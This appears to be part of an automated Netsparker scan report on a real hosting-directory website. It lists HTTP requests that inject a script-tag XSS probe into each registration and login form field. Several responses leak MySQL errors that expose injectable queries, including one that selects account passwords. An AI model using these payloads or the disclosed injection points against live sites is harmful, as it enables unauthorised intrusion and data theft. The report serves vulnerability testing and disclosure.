province | POST | 3
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | '"--></style></script><script>alert(0x001D16)</script>
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D16)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:51:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter | Type | Value
B1 | POST | Login
form_field | POST | 1
password | POST | 3
remember_both | POST | 1
remember_mail | POST | 1
temp_check | POST | 755
user_login | POST | '"--></style></script><script>alert(0x001D83)</script>
Request
POST /advert_login.php HTTP/1.1
Referer: http://www.hostingcatalog.com/advert_login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 176
Accept-Encoding: gzip, deflate

B1=Login&form_field=1&password=3&remember_both=1&remember_mail=1&temp_check=755&user_login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D83)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 24 Apr 2011 12:57:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 388

Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001d83)</script>' AND active NOT IN (2' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''"--></style></script><script>netsparker(0x001d83)</script>' AND active NOT IN (2,3,4)
Parameters
Parameter | Type | Value
company_name | POST | '"--></style></script><script>alert(0x001D84)</script>
first_name | POST | Smith
last_name | POST | Smith
address | POST | 3
address2 | POST | 3
city | POST | 3
state | POST | 3
province | POST | 3
zip | POST | 3
country | POST | 225
phone | POST | 3
e_mail | POST | netsparker@example.com
retype_e_mail | POST | netsparker@example.com
password | POST | 3
retype_password | POST | 3
account_type | POST | 1
deposit | POST | 3
promo_code | POST | 3
card_type | POST | 1
card_number | POST | 3
expire_date | POST | 3
owner_first_name | POST | Smith
owner_last_name | POST | Smith
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_state | POST | 3
bill_province | POST | 3
bill_zip | POST | 3
bill_country | POST | 225
bill_phone | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 540
Accept-Encoding: gzip, deflate

company_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D84)%3c%2fscript%3e&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 338
Connection: close
Content-Type: text/html; charset=UTF-8

Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001D84)</script>'' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''"--></style></script><script>netsparker(0x001D84)</script>'
Parameters
Parameter | Type | Value
company_name | POST | Smith
first_name | POST | '"--></style></script><script>alert(0x001D85)</script>
last_name | POST | Smith
address | POST | 3
address2 | POST | 3
city | POST | 3
state | POST | 3
province | POST | 3
zip | POST | 3
country | POST | 225
phone | POST | 3
e_mail | POST | netsparker@example.com
retype_e_mail | POST | netsparker@example.com
password | POST | 3
retype_password | POST | 3
account_type | POST | 1
deposit | POST | 3
promo_code | POST | 3
card_type | POST | 1
card_number | POST | 3
expire_date | POST | 3
owner_first_name | POST | Smith
owner_last_name | POST | Smith
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_state | POST | 3
bill_province | POST | 3
bill_zip | POST | 3
bill_country | POST | 225
bill_phone | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 540
Accept-Encoding: gzip, deflate

company_name=Smith&first_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D85)%3c%2fscript%3e&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter          Type  Value
company_name       POST  Smith
first_name         POST  Smith
last_name          POST  '"--></style></script><script>alert(0x001D86)</script>
address            POST  3
address2           POST  3
city               POST  3
state              POST  3
province           POST  3
zip                POST  3
country            POST  225
phone              POST  3
e_mail             POST  netsparker@example.com
retype_e_mail      POST  netsparker@example.com
password           POST  3
retype_password    POST  3
account_type       POST  1
deposit            POST  3
promo_code         POST  3
card_type          POST  1
card_number        POST  3
expire_date        POST  3
owner_first_name   POST  Smith
owner_last_name    POST  Smith
bill_address       POST  3
bill_address2      POST  3
bill_city          POST  3
bill_state         POST  3
bill_province      POST  3
bill_zip           POST  3
bill_country       POST  225
bill_phone         POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 540
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D86)%3c%2fscript%3e&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter          Type  Value
company_name       POST  Smith
first_name         POST  Smith
last_name          POST  Smith
address            POST  '"--></style></script><script>alert(0x001D87)</script>
address2           POST  3
city               POST  3
state              POST  3
province           POST  3
zip                POST  3
country            POST  225
phone              POST  3
e_mail             POST  netsparker@example.com
retype_e_mail      POST  netsparker@example.com
password           POST  3
retype_password    POST  3
account_type       POST  1
deposit            POST  3
promo_code         POST  3
card_type          POST  1
card_number        POST  3
expire_date        POST  3
owner_first_name   POST  Smith
owner_last_name    POST  Smith
bill_address       POST  3
bill_address2      POST  3
bill_city          POST  3
bill_state         POST  3
bill_province      POST  3
bill_zip           POST  3
bill_country       POST  225
bill_phone         POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D87)%3c%2fscript%3e&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters

| Parameter | Type | Value |
|---|---|---|
| company_name | POST | Smith |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | '"--></style></script><script>alert(0x001D88)</script> |
| city | POST | 3 |
| state | POST | 3 |
| province | POST | 3 |
| zip | POST | 3 |
| country | POST | 225 |
| phone | POST | 3 |
| e_mail | POST | netsparker@example.com |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| account_type | POST | 1 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_type | POST | 1 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D88)%3c%2fscript%3e&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD861283D16AC620B6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD6BD9D6AE648EBD286F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD49FB77B1E18A73BAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD87A019402FB1DBADC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBDA9F4A07E74CDA1E06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBD9BBF7DB490282A16C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBD6B6AF70CCF240354C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBD07FB19841CDA103B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBD07F7589504D5CC81C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBDEE1C6AC5FBE85C846F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='76E0188F5F077DBDB2215EE02B566BA8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBDCF7FB1A974B573CDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBDAB6F08E11D96523EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDBDDF8C71435DC998C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD9F6B32299F96F8C4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBD1B565D6B7322A5ACC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBD3335DED53E26F4056F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD7FAB24429ABB85AA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBD904FA4CAED95772F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters

| Parameter | Type | Value |
|---|---|---|
| company_name | POST | Smith |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | 3 |
| city | POST | '"--></style></script><script>alert(0x001D89)</script> |
| state | POST | 3 |
| province | POST | 3 |
| zip | POST | 3 |
| country | POST | 225 |
| phone | POST | 3 |
| e_mail | POST | netsparker@example.com |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| account_type | POST | 1 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_type | POST | 1 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D89)%3c%2fscript%3e&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
